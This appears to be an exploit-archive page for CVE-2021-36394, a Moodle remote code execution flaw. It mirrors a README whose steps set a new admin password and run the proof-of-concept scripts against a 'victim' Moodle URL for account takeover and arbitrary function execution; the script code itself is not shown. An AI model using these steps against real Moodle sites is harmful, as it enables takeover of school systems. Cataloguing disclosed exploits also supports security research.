Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-36394 PoC — Moodle 代码注入漏洞

Source
Associated Vulnerability
Title:Moodle 代码注入漏洞 (CVE-2021-36394)
Description:In Moodle, a remote code execution risk was identified in the Shibboleth authentication plugin.
Readme
# CVE-2021-36394


## Update table or Change password Admin: 

Custom Code
`
$newpassword = "Accounttakedover123";
`
Then Execute:


`
$ CVE2021-36394.php http://victim/path_to_moodle
`

## Execute function
Custom Code
`$function = "header";
$param = "Hacked: by0d0ff9";
`

Then Execute:

`
$ CVE2021-36394_RCE.php http://victim/path_to_moodle
`

### Demo: https://www.youtube.com/watch?v=rn4ENyASWe8
### Blog: https://0xd0ff9.wordpress.com/2021/08/28/cve-2021-36394-hack-truong-sua-diem-cac-kieu/
File Snapshot

[4.0K] /data/pocs/6c25db07e20087a3b03a06fc1d0ee1354c17629c ├── [4.1K] CVE2021-36394.php ├── [2.9K] CVE2021-36394_RCE.php ├── [ 55M] moodle-3.9.7.tgz └── [ 498] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →